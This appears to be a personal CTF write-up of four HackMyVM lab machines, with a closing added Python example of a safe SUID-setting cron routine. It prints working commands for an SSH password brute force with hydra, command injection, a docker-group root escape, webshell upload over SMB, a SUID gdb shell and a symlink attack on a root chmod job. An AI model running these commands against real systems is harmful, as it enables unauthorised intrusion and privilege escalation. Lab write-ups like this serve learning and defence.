HackMyVM: Gift, Pwned, Connection and Suidy
A four box multi-event. lol.
Gift
SSH and HTTP. HTTP says:
Dont Overthink. Really, Its simple.
┌──(root💀kali)-[/opt/hackmyvm/gift]
└─# hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.24 -I
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-12 00:53:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.10.24:22/
[STATUS] 179.00 tries/min, 179 tries in 00:01h, 14344223 to do in 1335:36h, 16 active
[22][ssh] host: 10.10.10.24 login: root password: simple
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-12 00:56:02
┌──(root💀kali)-[/opt/hackmyvm/gift]
└─# ssh root@10.10.10.24 255 ⨯
root@10.10.10.24's password:
IM AN SSH SERVER
gift:~#
Yeah, they weren’t kidding.
Pwned
HTTP enumeration leads to /hidden_text/, which contains secret.dic, a list of directories. Most are duds, but /pwned.vuln/ is live and contains FTP creds. From the FTP server we get an SSH key and a username.
Once on the box we can run a shell script which allows command injection to pivot to our next user.
Welcome to linux.messenger
ariana:
selena:
ftpuser:
Enter username to send message : sh
Enter message for sh :sh
Sending message to sh
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash");'
selena@pwned:/home$
Selena is in the docker group, so we are home: mounting the host's root filesystem into a container and chrooting into it gives a root shell on the host.
selena@pwned:/tmp$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
privesc latest 09ae39f0f8fc 17 months ago 88.3MB
<none> <none> e13ad046d435 17 months ago 88.3MB
alpine latest a24bb4013296 18 months ago 5.57MB
debian wheezy 10fcec6d95c4 2 years ago 88.3MB
selena@pwned:/tmp$ docker run -it -v /:/host/ alpine chroot /host/ bash
root@6861a7b8e459:/# cd /root
root@6861a7b8e459:~# ls -lash
total 28K
4.0K drwx------ 3 root root 4.0K Jul 10 2020 .
4.0K drwxr-xr-x 18 root root 4.0K Jul 6 2020 ..
4.0K -rw------- 1 root root 292 Jul 10 2020 .bash_history
4.0K -rw-r--r-- 1 root root 601 Jul 6 2020 .bashrc
4.0K drwxr-xr-x 3 root root 4.0K Jul 4 2020 .local
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw-r--r-- 1 root root 429 Jul 10 2020 root.txt
root@6861a7b8e459:~#
Connection
This one has SMB with anonymous login and the share suspiciously contains index.html; yes it’s linked to the webroot. We can upload a shell and we are away.
┌──(root💀kali)-[/opt/hackmyvm/connection]
└─# smbclient.py 10.10.10.26
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
Type help for list of commands
# shares
share
print$
IPC$
# use share
# ls
drw-rw-rw- 0 Tue Sep 22 21:48:39 2020 .
drw-rw-rw- 0 Tue Sep 22 21:48:39 2020 ..
drw-rw-rw- 0 Tue Sep 22 22:20:00 2020 html
# cd html
# ls
drw-rw-rw- 0 Tue Sep 22 22:20:00 2020 .
drw-rw-rw- 0 Tue Sep 22 21:48:39 2020 ..
-rw-rw-rw- 10701 Tue Sep 22 21:48:45 2020 index.html
# put test.txt
# ls
drw-rw-rw- 0 Sun Dec 12 01:31:51 2021 .
drw-rw-rw- 0 Tue Sep 22 21:48:39 2020 ..
-rw-rw-rw- 10701 Tue Sep 22 21:48:45 2020 index.html
-rw-rw-rw- 5 Sun Dec 12 01:31:51 2021 test.txt
# put shell.php
# put linpeas.sh
Note this box doesn’t have wget or curl, so it’s convenient to use SMB to upload linpeas too.
It’s also got GDB with the SUID bit set, so that’s the privesc:
www-data@connection:/tmp$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls -lash
ls -lash
total 24K
4.0K drwx------ 3 root root 4.0K Sep 22 2020 .
4.0K drwxr-xr-x 18 root root 4.0K Sep 22 2020 ..
0 lrwxrwxrwx 1 root root 9 Sep 22 2020 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
4.0K drwxr-xr-x 3 root root 4.0K Sep 22 2020 .local
0 lrwxrwxrwx 1 root root 9 Sep 22 2020 .mysql_history -> /dev/null
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rwx------ 1 root root 33 Sep 22 2020 proof.txt
#
Suidy
This one was a bit trickier, but it’s also the only one rated Medium. The other three were all Easy. It’s SSH and HTTP.
At the bottom of robots.txt we find /shehatesme/ which says:
She hates me because I FOUND THE REAL SECRET!
I put in this directory a lot of .txt files.
ONE of .txt files contains credentials like “theuser/thepass” to access to her system!
All that you need is an small dict from Seclist!
I run feroxbuster:
feroxbuster -u http://10.10.10.27//shehatesme -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 200 -C 403 --no-recursion -x txt
And generate a list of files, which I then download with wget:
while read -r p; do wget "$p"; done < files.txt
And then I have a list of potential usernames and passwords. And it is obvious the creator has a sense of humour, since the creds are theuser:thepass. lol.
┌──(root💀kali)-[/opt/hackmyvm/suidy/files]
└─# ssh theuser@10.10.10.27
theuser@10.10.10.27's password:
Linux suidy 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 27 00:41:28 2020
theuser@suidy:~$ sudo -l
-bash: sudo: orden no encontrada
theuser@suidy:~$
We’ve got an SUID binary we can use to escalate to the next user:
theuser@suidy:/home/suidy$ ls -lash
total 52K
4,0K drwxr-xr-x 3 suidy suidy 4,0K sep 27 2020 .
4,0K drwxr-xr-x 4 root root 4,0K sep 26 2020 ..
4,0K -rw------- 1 suidy suidy 12 sep 27 2020 .bash_history
4,0K -rw-r--r-- 1 suidy suidy 220 sep 26 2020 .bash_logout
4,0K -rw-r--r-- 1 suidy suidy 3,5K sep 26 2020 .bashrc
4,0K drwxr-xr-x 3 suidy suidy 4,0K sep 26 2020 .local
4,0K -r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
4,0K -rw-r--r-- 1 suidy suidy 807 sep 26 2020 .profile
20K -rwsrwsr-x 1 root theuser 17K sep 26 2020 suidyyyyy
theuser@suidy:/home/suidy$ ./suidyyyyy
suidy@suidy:/home/suidy$ whoami
suidy
suidy@suidy:/home/suidy$ cat note.txt
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID.
If you are "theuser" I hate you!
-suidy
suidy@suidy:/home/suidy$
I copy the binary to backup and try creating a new file; sure enough, it gets the SUID bit set after about a minute. We can’t see the cron job, but it is running as root. However, SUID only grants the privileges of the file’s owner, and the new file is owned by suidy rather than root, e.g.
suidy@suidy:/home/suidy$ cp /bin/bash ./suidyyyyy
suidy@suidy:/home/suidy$ ls -lash
total 1,2M
4,0K drwxr-xr-x 3 suidy suidy 4,0K dic 12 08:03 .
4,0K drwxr-xr-x 4 root root 4,0K sep 26 2020 ..
20K -rwsrwsr-x 1 root theuser 17K sep 26 2020 backup
4,0K -rw------- 1 suidy suidy 12 sep 27 2020 .bash_history
4,0K -rw-r--r-- 1 suidy suidy 220 sep 26 2020 .bash_logout
4,0K -rw-r--r-- 1 suidy suidy 3,5K sep 26 2020 .bashrc
4,0K drwxr-xr-x 3 suidy suidy 4,0K sep 26 2020 .local
4,0K -r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
4,0K -rw-r--r-- 1 suidy suidy 807 sep 26 2020 .profile
1,2M -rwxr-xr-x 1 suidy theuser 1,2M dic 12 08:03 suidyyyyy
suidy@suidy:/home/suidy$ date
dom dic 12 08:04:16 CET 2021
suidy@suidy:/home/suidy$ ls -lash
total 1,2M
4,0K drwxr-xr-x 3 suidy suidy 4,0K dic 12 08:03 .
4,0K drwxr-xr-x 4 root root 4,0K sep 26 2020 ..
20K -rwsrwsr-x 1 root theuser 17K sep 26 2020 backup
4,0K -rw------- 1 suidy suidy 12 sep 27 2020 .bash_history
4,0K -rw-r--r-- 1 suidy suidy 220 sep 26 2020 .bash_logout
4,0K -rw-r--r-- 1 suidy suidy 3,5K sep 26 2020 .bashrc
4,0K drwxr-xr-x 3 suidy suidy 4,0K sep 26 2020 .local
4,0K -r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
4,0K -rw-r--r-- 1 suidy suidy 807 sep 26 2020 .profile
1,2M -rwsr-sr-x 1 suidy theuser 1,2M dic 12 08:03 suidyyyyy
suidy@suidy:/home/suidy$ ./suidyyyyy -p
suidy@suidy:/home/suidy$ id
uid=1001(suidy) gid=1000(theuser) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
suidy@suidy:/home/suidy$
So, how can we have a file owned by root? With a symlink: chmod follows it, so the bit lands on /bin/bash itself.
suidy@suidy:/home/suidy$ ln -s /bin/bash suidyyyyy
suidy@suidy:/home/suidy$ ls -lash
total 52K
4,0K drwxr-xr-x 3 suidy suidy 4,0K dic 12 10:20 .
4,0K drwxr-xr-x 4 root root 4,0K sep 26 2020 ..
20K -rwsrwsr-x 1 root theuser 17K sep 26 2020 backup
4,0K -rw------- 1 suidy suidy 12 sep 27 2020 .bash_history
4,0K -rw-r--r-- 1 suidy suidy 220 sep 26 2020 .bash_logout
4,0K -rw-r--r-- 1 suidy suidy 3,5K sep 26 2020 .bashrc
4,0K drwxr-xr-x 3 suidy suidy 4,0K sep 26 2020 .local
4,0K -r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
4,0K -rw-r--r-- 1 suidy suidy 807 sep 26 2020 .profile
0 lrwxrwxrwx 1 suidy theuser 9 dic 12 10:20 suidyyyyy -> /bin/bash
suidy@suidy:/home/suidy$ ls -lash
total 52K
4,0K drwxr-xr-x 3 suidy suidy 4,0K dic 12 10:20 .
4,0K drwxr-xr-x 4 root root 4,0K sep 26 2020 ..
20K -rwsrwsr-x 1 root theuser 17K sep 26 2020 backup
4,0K -rw------- 1 suidy suidy 12 sep 27 2020 .bash_history
4,0K -rw-r--r-- 1 suidy suidy 220 sep 26 2020 .bash_logout
4,0K -rw-r--r-- 1 suidy suidy 3,5K sep 26 2020 .bashrc
4,0K drwxr-xr-x 3 suidy suidy 4,0K sep 26 2020 .local
4,0K -r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
4,0K -rw-r--r-- 1 suidy suidy 807 sep 26 2020 .profile
0 lrwxrwxrwx 1 suidy theuser 9 dic 12 10:20 suidyyyyy -> /bin/bash
suidy@suidy:/home/suidy$ ./suidyyyyy -p
suidyyyyy-5.0# id
uid=1001(suidy) gid=1000(theuser) euid=0(root) egid=0(root) grupos=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(theuser)
suidyyyyy-5.0# cd /root
suidyyyyy-5.0#
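The root cron job on Suidy presumably runs something like chmod u+s on /home/suidy/suidyyyyy, and chmod follows symlinks. As an added example, not from the box or the original post, here is how such a job should be written: it refuses anything that is not a regular file owned by the expected user, then chmods a descriptor opened with O_NOFOLLOW so the check cannot be raced. The set_suid_safely and demo names and the temp-dir scenario are constructed for this illustration.

```python
import os
import stat
import tempfile

def set_suid_safely(path: str, expected_uid: int) -> bool:
    """Set the setuid bit on path only if it is a regular file owned by
    expected_uid. Returns True if the bit was set, False if refused."""
    # lstat() does not follow links, so a symlink to /bin/bash is seen as a link.
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode) or st.st_uid != expected_uid:
        return False  # symlink, device, or a hard link to a root-owned binary
    try:
        # O_NOFOLLOW closes the check-then-chmod race: a link swapped in after
        # the lstat makes the open fail with ELOOP instead of being followed.
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:
        return False
    try:
        fst = os.fstat(fd)
        if not stat.S_ISREG(fst.st_mode) or fst.st_uid != expected_uid:
            return False
        os.fchmod(fd, stat.S_IMODE(fst.st_mode) | stat.S_ISUID)
    finally:
        os.close(fd)
    return True

def demo() -> dict:
    """Constructed scenario: a real suidyyyyy and a symlink suidyyyyy_link
    pointing at a stand-in for /bin/bash, all owned by the current user."""
    me = os.getuid()
    d = tempfile.mkdtemp()
    target = os.path.join(d, "target")  # stands in for /bin/bash
    real = os.path.join(d, "suidyyyyy")
    for p in (target, real):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, 0o755)
    link = os.path.join(d, "suidyyyyy_link")
    os.symlink(target, link)
    return {
        "regular_file": set_suid_safely(real, me),             # True
        "symlink": set_suid_safely(link, me),                  # False
        "regular_mode": stat.S_IMODE(os.stat(real).st_mode),   # 0o4755
        "target_mode": stat.S_IMODE(os.stat(target).st_mode),  # 0o755, untouched
    }

if __name__ == "__main__":
    print(demo())
```

The owner check also stops a hard link to a root-owned binary, since the link shares the target's uid.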
And done. Also it must be a bit quiet this arvo because on the frontpage under last bloods:
2021-12-12 10:21:42 ordnaryday got root in suidy
2021-12-12 08:00:10 ordnaryday got user in suidy
2021-12-12 07:40:21 ordnaryday got root in Connection
2021-12-12 07:33:27 ordnaryday got user in Connection
2021-12-12 07:28:16 ordnaryday got root in Pwned
2021-12-12 07:18:45 ordnaryday got user in Pwned
2021-12-12 07:10:23 ordnaryday got root in Gift
2021-12-12 07:10:11 ordnaryday got user in Gift
And yes root on suidy did take me longer but also I stopped for dinner.